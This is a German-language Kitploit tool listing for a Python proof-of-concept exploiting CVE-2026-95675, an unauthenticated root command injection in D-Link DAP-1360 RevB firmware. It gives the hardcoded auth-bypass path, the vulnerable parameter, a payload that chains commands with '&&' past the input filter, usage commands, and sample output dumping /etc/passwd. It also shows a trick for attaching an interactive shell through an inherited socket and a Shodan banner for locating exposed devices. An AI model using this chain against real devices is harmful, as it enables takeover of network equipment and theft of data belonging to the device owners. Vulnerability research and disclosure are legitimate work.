Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-95675 — Python-PoC, das CVE-2026-95675 ausnutzt, eine unauthentifizierte Root-Befehlsinjektion in der D-Link DAP-1360 RevB Firmware über einen hardcodierten Auth-Bypass und den formSystemCheck-Handler. | Kitploit
Tools/GitHubGitHub/d6fault/cve-2026-95675
Embedded-System-SicherheitIoT-SicherheitSchwachstellenanalyseExploitationReverse EngineeringWebanwendungs-ExploitationHardware- & IoT-SicherheitRemote-Access-ToolFirmware-Analyse
GitHubd6fault/cve-2026-95675

CVE-2026-95675

12vor 9h 49mNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Python-PoC, das CVE-2026-95675 ausnutzt, eine unauthentifizierte Root-Befehlsinjektion in der D-Link DAP-1360 RevB Firmware über einen hardcodierten Auth-Bypass und den formSystemCheck-Handler.

Repository anzeigen

CVE-2026-95675 — D-Link DAP-1360 RevB

Unauthentifizierte Remote-Root-Befehlsausführung (CWE-78 — OS Command Injection) im formSystemCheck-Handler, erreichbar über eine hartcodierte Authentifizierungs-Backdoor. Verifiziert gegen DAP-1360 RevB, Firmware 2.14B05.

Ursache

Zwei unabhängige Probleme, die verkettet werden:

1. Hartcodierter Auth-Bypass-Pfad. In main (httpd @ 0x4064c8):

root@kitploit:~
strcasecmp(request_path, "dEfWzDLOgIn")   ; token @ 0x48046c
  ...
  sw 1, 8(sp_login_slot)                  ; mark this source-IP as logged in

GET /dEfWzDLOgIn gibt 404 zurück (es ist keine echte Datei), markiert aber als Seiteneffekt den Session-Slot der anfragenden Quell-IP als authentifiziert — ohne Benutzername, Passwort oder Captcha.

2. OS Command Injection. formSystemCheck (POST /apply.cgi?formSystemCheck) baut einen Shell-Befehl mit:

root@kitploit:~
_system("ping %s -c 2 >/tmp/test_ping", cgi("ipv4_ping"))

ipv4_ping wird ungefiltert in den Format-String übergeben; _system() verwendet vsprintf in einen festen Stack-Puffer und übergibt diesen an system(). Der Handler führt selbst keine Authentifizierungsprüfung durch.

Parser-Einschränkung

Der busybox POST-Body-Parser entfernt ;, |, Backtick und Newline, aber && überlebt. Eine Payload muss das Präfix ping beenden und dann mit && verketten, z. B.:

root@kitploit:~
127.0.0.1 -c 1 && <command> > /www/out.htm && x

Verwendung

root@kitploit:~
python3 autopoc.py <target> [command]

python3 autopoc.py 192.168.0.50
python3 autopoc.py 192.168.0.50 "ls -la /"
ArgBeschreibung
targetZiel-Host/IP (Standard-Schema http://)
command (optional)auszuführender Root-Befehl (Standard: ); verwende , nicht /`

Funktionsweise

  1. GET /dEfWzDLOgIn — löst den hartcodierten Auth-Bypass aus (gibt 404 zurück; der Seiteneffekt tritt serverseitig auf).
  2. POST /apply.cgi?formSystemCheck mit ipv4_ping=127.0.0.1 -c 1 && <cmd> > /www/<OUT> && x — Root-Befehlsinjektion.
  3. GET /<OUT> — ruft die Befehlsausgabe ab (httpd liefert .htm/.html, nicht .txt).

Ausgabe

root@kitploit:~
[*] target   : 192.168.0.50
[*] command  : cat /etc/passwd
[*] GET /dEfWzDLOgIn -> 404 (login slot flagged)
[*] POST /apply.cgi?formSystemCheck -> 302
[+] output (RCE.htm):
------------------------------------------------------------
root:x:0:0:root:/:/dev/null
nobody:x:0:0:nobody:/:/dev/null
------------------------------------------------------------

Hinweise / Einschränkungen

  • Das busybox des Geräts hat kein nc, wget, base64, chmod, id — verwende cat, echo, ls, cp usw.
  • Die Ausgabe wird in das weltweit beschreibbare Docroot geschrieben und über HTTP abgerufen (kein Listener erforderlich).
  • Für eine interaktive Shell erbt der injizierte Prozess den Client-Socket als fd 5; in Kombination damit, dass httpd die Antwort bis zur Rückkehr von _system() verzögert, kann sh <&5 >&5 2>&5 eine Shell an die aktive Verbindung anhängen (fragil unter User-Mode-QEMU; besser auf echter Hardware).
  • Nicht anwendbar auf DAP-1360 RevC1 / Firmware 3.00 oder die „D-Link Russia"-DIR/xDSL-Builds — andere Endpunkte, Docroot und Parser. Diese erfordern eine separate Analyse.

Exposition

Shodan ("CAMEO-httpd", das httpd-Vendor-Banner) zeigt nur eine kleine Anzahl internet-exponierter Instanzen genau dieser Codebasis; das Gerät ist primär ein LAN-seitiger Access Point. Eine Ausnutzung erfordert die Erreichbarkeit der Web-Management-Oberfläche.

Tool herunterladen
cat /etc/passwd
&&
;